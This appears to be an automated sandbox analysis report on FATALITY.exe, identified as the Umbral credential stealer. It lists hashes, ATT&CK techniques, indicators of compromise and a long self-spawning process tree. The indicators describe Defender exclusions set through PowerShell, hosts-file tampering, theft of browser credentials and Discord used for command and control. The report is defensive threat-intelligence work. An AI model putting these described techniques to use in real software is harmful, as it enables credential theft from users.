umbral | 441d4439cd72a239077d97895571804711356f1e1ded396c229635adf3c80ea4

Resubmissions

16-07-2024 21:58

240716-1vxjessaqm 10

Analysis

max time kernel
8s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
16-07-2024 21:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FATALITY.exe
Size

2.5MB
MD5

4320dae0d20c88ceb6f28b623a916dd2
SHA1

c1218c51804a602115462ea8259578fdbb280468
SHA256

441d4439cd72a239077d97895571804711356f1e1ded396c229635adf3c80ea4
SHA512

ee32e90d021835d608d43d3ee6d2d107fcfb15fa174c179ed4ae7dd47ec0dd45baadd1c73158c73d5e4fd7b89f5925ae505a6df66bb81e9d5693216316622fcf
SSDEEP

49152:U14vPsUk84QgsmsQgt/KOQtLvwnQ/7syEL+mZ1TxrYgHZfr2gsNS1zb9cVg1Z2U/:JPtmLgtTGTwQAyY3TdYCsI1zAgb27wh

Score

10^/10

umbral execution spyware stealer

Malware Config

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x00070000000234f2-5.dat	family_umbral
behavioral1/memory/4724-24-0x000002A3FD320000-0x000002A3FD360000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral

Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3148	powershell.exe
3180	powershell.exe
4024	powershell.exe
5488	Process not Found
3616	Process not Found
2588	powershell.exe
4432	Process not Found
5944	Process not Found
1976	Process not Found
5348	Process not Found
2564	Process not Found
996	Process not Found
4556	powershell.exe
4872	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe

Checks computer location settings 2 TTPs 37 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	FATALITY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	FATALITY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	FATALITY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	FATALITY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	FATALITY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	FATALITY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	FATALITY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	FATALITY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	FATALITY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	FATALITY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	FATALITY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	FATALITY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	FATALITY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	FATALITY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	FATALITY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	FATALITY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	FATALITY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	FATALITY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	FATALITY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	FATALITY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	FATALITY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	FATALITY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	FATALITY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	FATALITY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	FATALITY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	FATALITY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	FATALITY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	FATALITY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	FATALITY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	FATALITY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	FATALITY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	FATALITY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	FATALITY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	FATALITY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	FATALITY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	FATALITY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	FATALITY.exe

Executes dropped EXE 64 IoCs

pid	Process
4468	FATALITY.exe
4724	Umbral.exe
4476	Windows Defender.exe
1784	FATALITY.exe
4972	Umbral.exe
4836	Windows Defender.exe
4864	FATALITY.exe
2868	Umbral.exe
1308	Windows Defender.exe
2256	FATALITY.exe
1188	Umbral.exe
548	Windows Defender.exe
3724	FATALITY.exe
2336	Umbral.exe
3504	Windows Defender.exe
3484	FATALITY.exe
3260	Umbral.exe
732	Windows Defender.exe
972	FATALITY.exe
1000	Umbral.exe
4816	Windows Defender.exe
4348	FATALITY.exe
2232	Umbral.exe
3152	Windows Defender.exe
4076	FATALITY.exe
4448	Umbral.exe
2388	Windows Defender.exe
1196	FATALITY.exe
4612	Umbral.exe
2268	Windows Defender.exe
4064	FATALITY.exe
4048	Umbral.exe
2588	Windows Defender.exe
4468	FATALITY.exe
3884	Umbral.exe
4284	Windows Defender.exe
1644	FATALITY.exe
4952	Umbral.exe
3924	Windows Defender.exe
3640	FATALITY.exe
3064	Umbral.exe
4036	Windows Defender.exe
448	FATALITY.exe
1500	Umbral.exe
2812	Windows Defender.exe
756	FATALITY.exe
2568	Umbral.exe
2728	Windows Defender.exe
2232	FATALITY.exe
1020	Umbral.exe
4816	Windows Defender.exe
4872	FATALITY.exe
2844	Umbral.exe
1116	Windows Defender.exe
1940	FATALITY.exe
2352	Umbral.exe
3812	Windows Defender.exe
5016	FATALITY.exe
4064	Umbral.exe
2852	Windows Defender.exe
4284	FATALITY.exe
2032	Umbral.exe
4580	Windows Defender.exe
4584	FATALITY.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 26 IoCs

Web Service

T1102

flow	ioc
140	discord.com
147	discord.com
25	discord.com
33	discord.com
69	discord.com
119	discord.com
120	discord.com
130	discord.com
148	discord.com
24	discord.com
32	discord.com
46	discord.com
47	discord.com
168	discord.com
61	discord.com
161	discord.com
162	discord.com
60	discord.com
155	discord.com
169	discord.com
68	discord.com
129	discord.com
139	discord.com
154	discord.com
94	discord.com
95	discord.com

Looks up external IP address via web service 14 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
29	ip-api.com
65	ip-api.com
98	ip-api.com
165	ip-api.com
37	ip-api.com
56	ip-api.com
72	ip-api.com
123	ip-api.com
135	ip-api.com
158	ip-api.com
11	ip-api.com
144	ip-api.com
151	ip-api.com
172	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 13 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3872	wmic.exe
1244	wmic.exe
5712	Process not Found
2948	wmic.exe
644	Process not Found
244	Process not Found
1092	wmic.exe
5592	Process not Found
5176	Process not Found
5808	Process not Found
4528	Process not Found
2092	wmic.exe
5420	Process not Found

Runs ping.exe 1 TTPs 13 IoCs

Remote System Discovery

T1018

pid	Process
552	PING.EXE
4284	Process not Found
4448	Process not Found
5944	Process not Found
2256	PING.EXE
2256	PING.EXE
5924	Process not Found
5560	Process not Found
4952	Process not Found
3564	PING.EXE
5056	PING.EXE
740	Process not Found
4420	Process not Found

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
4724	Umbral.exe
4556	powershell.exe
4556	powershell.exe
2600	powershell.exe
2600	powershell.exe
4628	powershell.exe
4628	powershell.exe
1152	powershell.exe
1152	powershell.exe

Suspicious use of AdjustPrivilegeToken 47 IoCs

description	pid	Process
Token: SeDebugPrivilege	4724	Umbral.exe
Token: SeIncreaseQuotaPrivilege	2568	wmic.exe
Token: SeSecurityPrivilege	2568	wmic.exe
Token: SeTakeOwnershipPrivilege	2568	wmic.exe
Token: SeLoadDriverPrivilege	2568	wmic.exe
Token: SeSystemProfilePrivilege	2568	wmic.exe
Token: SeSystemtimePrivilege	2568	wmic.exe
Token: SeProfSingleProcessPrivilege	2568	wmic.exe
Token: SeIncBasePriorityPrivilege	2568	wmic.exe
Token: SeCreatePagefilePrivilege	2568	wmic.exe
Token: SeBackupPrivilege	2568	wmic.exe
Token: SeRestorePrivilege	2568	wmic.exe
Token: SeShutdownPrivilege	2568	wmic.exe
Token: SeDebugPrivilege	2568	wmic.exe
Token: SeSystemEnvironmentPrivilege	2568	wmic.exe
Token: SeRemoteShutdownPrivilege	2568	wmic.exe
Token: SeUndockPrivilege	2568	wmic.exe
Token: SeManageVolumePrivilege	2568	wmic.exe
Token: 33	2568	wmic.exe
Token: 34	2568	wmic.exe
Token: 35	2568	wmic.exe
Token: 36	2568	wmic.exe
Token: SeIncreaseQuotaPrivilege	2568	wmic.exe
Token: SeSecurityPrivilege	2568	wmic.exe
Token: SeTakeOwnershipPrivilege	2568	wmic.exe
Token: SeLoadDriverPrivilege	2568	wmic.exe
Token: SeSystemProfilePrivilege	2568	wmic.exe
Token: SeSystemtimePrivilege	2568	wmic.exe
Token: SeProfSingleProcessPrivilege	2568	wmic.exe
Token: SeIncBasePriorityPrivilege	2568	wmic.exe
Token: SeCreatePagefilePrivilege	2568	wmic.exe
Token: SeBackupPrivilege	2568	wmic.exe
Token: SeRestorePrivilege	2568	wmic.exe
Token: SeShutdownPrivilege	2568	wmic.exe
Token: SeDebugPrivilege	2568	wmic.exe
Token: SeSystemEnvironmentPrivilege	2568	wmic.exe
Token: SeRemoteShutdownPrivilege	2568	wmic.exe
Token: SeUndockPrivilege	2568	wmic.exe
Token: SeManageVolumePrivilege	2568	wmic.exe
Token: 33	2568	wmic.exe
Token: 34	2568	wmic.exe
Token: 35	2568	wmic.exe
Token: 36	2568	wmic.exe
Token: SeDebugPrivilege	4556	powershell.exe
Token: SeDebugPrivilege	2600	powershell.exe
Token: SeDebugPrivilege	4628	powershell.exe
Token: SeDebugPrivilege	1152	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1136 wrote to memory of 4468	1136	FATALITY.exe	126
PID 1136 wrote to memory of 4468	1136	FATALITY.exe	126
PID 1136 wrote to memory of 4468	1136	FATALITY.exe	126
PID 1136 wrote to memory of 4724	1136	FATALITY.exe	87
PID 1136 wrote to memory of 4724	1136	FATALITY.exe	87
PID 1136 wrote to memory of 4476	1136	FATALITY.exe	88
PID 1136 wrote to memory of 4476	1136	FATALITY.exe	88
PID 1136 wrote to memory of 4476	1136	FATALITY.exe	88
PID 4468 wrote to memory of 1784	4468	FATALITY.exe	89
PID 4468 wrote to memory of 1784	4468	FATALITY.exe	89
PID 4468 wrote to memory of 1784	4468	FATALITY.exe	89
PID 4468 wrote to memory of 4972	4468	FATALITY.exe	90
PID 4468 wrote to memory of 4972	4468	FATALITY.exe	90
PID 4468 wrote to memory of 4836	4468	FATALITY.exe	162
PID 4468 wrote to memory of 4836	4468	FATALITY.exe	162
PID 4468 wrote to memory of 4836	4468	FATALITY.exe	162
PID 1784 wrote to memory of 4864	1784	FATALITY.exe	92
PID 1784 wrote to memory of 4864	1784	FATALITY.exe	92
PID 1784 wrote to memory of 4864	1784	FATALITY.exe	92
PID 1784 wrote to memory of 2868	1784	FATALITY.exe	93
PID 1784 wrote to memory of 2868	1784	FATALITY.exe	93
PID 1784 wrote to memory of 1308	1784	FATALITY.exe	94
PID 1784 wrote to memory of 1308	1784	FATALITY.exe	94
PID 1784 wrote to memory of 1308	1784	FATALITY.exe	94
PID 4724 wrote to memory of 2568	4724	Umbral.exe	267
PID 4724 wrote to memory of 2568	4724	Umbral.exe	267
PID 4864 wrote to memory of 2256	4864	FATALITY.exe	97
PID 4864 wrote to memory of 2256	4864	FATALITY.exe	97
PID 4864 wrote to memory of 2256	4864	FATALITY.exe	97
PID 4864 wrote to memory of 1188	4864	FATALITY.exe	98
PID 4864 wrote to memory of 1188	4864	FATALITY.exe	98
PID 4864 wrote to memory of 548	4864	FATALITY.exe	214
PID 4864 wrote to memory of 548	4864	FATALITY.exe	214
PID 4864 wrote to memory of 548	4864	FATALITY.exe	214
PID 2256 wrote to memory of 3724	2256	FATALITY.exe	275
PID 2256 wrote to memory of 3724	2256	FATALITY.exe	275
PID 2256 wrote to memory of 3724	2256	FATALITY.exe	275
PID 2256 wrote to memory of 2336	2256	FATALITY.exe	248
PID 2256 wrote to memory of 2336	2256	FATALITY.exe	248
PID 2256 wrote to memory of 3504	2256	FATALITY.exe	283
PID 2256 wrote to memory of 3504	2256	FATALITY.exe	283
PID 2256 wrote to memory of 3504	2256	FATALITY.exe	283
PID 3724 wrote to memory of 3484	3724	FATALITY.exe	104
PID 3724 wrote to memory of 3484	3724	FATALITY.exe	104
PID 3724 wrote to memory of 3484	3724	FATALITY.exe	104
PID 3724 wrote to memory of 3260	3724	FATALITY.exe	105
PID 3724 wrote to memory of 3260	3724	FATALITY.exe	105
PID 3724 wrote to memory of 732	3724	FATALITY.exe	106
PID 3724 wrote to memory of 732	3724	FATALITY.exe	106
PID 3724 wrote to memory of 732	3724	FATALITY.exe	106
PID 3484 wrote to memory of 972	3484	FATALITY.exe	250
PID 3484 wrote to memory of 972	3484	FATALITY.exe	250
PID 3484 wrote to memory of 972	3484	FATALITY.exe	250
PID 3484 wrote to memory of 1000	3484	FATALITY.exe	347
PID 3484 wrote to memory of 1000	3484	FATALITY.exe	347
PID 3484 wrote to memory of 4816	3484	FATALITY.exe	284
PID 3484 wrote to memory of 4816	3484	FATALITY.exe	284
PID 3484 wrote to memory of 4816	3484	FATALITY.exe	284
PID 4724 wrote to memory of 3408	4724	Umbral.exe	565
PID 4724 wrote to memory of 3408	4724	Umbral.exe	565
PID 972 wrote to memory of 4348	972	FATALITY.exe	504
PID 972 wrote to memory of 4348	972	FATALITY.exe	504
PID 972 wrote to memory of 4348	972	FATALITY.exe	504
PID 972 wrote to memory of 2232	972	FATALITY.exe	454

Views/modifies file attributes 1 TTPs 14 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
392	attrib.exe
5392	Process not Found
3432	attrib.exe
2316	attrib.exe
628	Process not Found
3408	attrib.exe
3904	attrib.exe
5720	Process not Found
2612	Process not Found
4640	Process not Found
5768	Process not Found
6096	Process not Found
3052	attrib.exe
5560	Process not Found

C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
"C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1136
- C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
  "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4468
- - C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
    "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1784
  - - C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
      "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4864
    - - C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2256
      - C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3724
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3484
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:972
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        9⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4348
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        10⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4076
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        11⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1196
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        12⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4064
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        13⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4468
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        14⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1644
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        15⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3640
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        16⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:448
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        17⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:756
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        18⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2232
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        19⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4872
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        20⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1940
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        21⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5016
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        22⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4284
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        23⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4584
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        24⤵
        Checks computer location settings
        
        PID:1644
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        25⤵
        Checks computer location settings
        
        PID:4908
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        26⤵
        Checks computer location settings
        
        PID:3372
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        27⤵
        Checks computer location settings
        
        PID:4976
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        28⤵
        Checks computer location settings
        
        PID:4364
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        29⤵
        Checks computer location settings
        
        PID:4292
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        30⤵
        Checks computer location settings
        
        PID:4412
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        31⤵
        Checks computer location settings
        
        PID:2592
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        32⤵
        Checks computer location settings
        
        PID:4632
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        33⤵
        Checks computer location settings
        
        PID:2788
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        34⤵
        Checks computer location settings
        
        PID:5116
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        35⤵
        Checks computer location settings
        
        PID:4792
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        36⤵
        Checks computer location settings
        
        PID:1796
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        37⤵
        Checks computer location settings
        
        PID:2516
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        38⤵
        
        PID:1708
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        39⤵
        
        PID:552
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        40⤵
        
        PID:4876
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        41⤵
        
        PID:2096
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        42⤵
        
        PID:4428
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        43⤵
        
        PID:2564
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        44⤵
        
        PID:2408
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        45⤵
        
        PID:3308
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        46⤵
        
        PID:3800
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        47⤵
        
        PID:1796
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        48⤵
        
        PID:3408
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        49⤵
        
        PID:4640
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        50⤵
        
        PID:2128
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        51⤵
        
        PID:1464
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        52⤵
        
        PID:4632
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        53⤵
        
        PID:1392
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        54⤵
        
        PID:4396
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        55⤵
        
        PID:1604
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        56⤵
        
        PID:2408
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        57⤵
        
        PID:3724
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        58⤵
        
        PID:4824
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        59⤵
        
        PID:3504
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        60⤵
        
        PID:3360
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        61⤵
        
        PID:5040
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        62⤵
        
        PID:4364
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        63⤵
        
        PID:2844
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        64⤵
        
        PID:1196
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        65⤵
        
        PID:2032
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        66⤵
        
        PID:4000
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
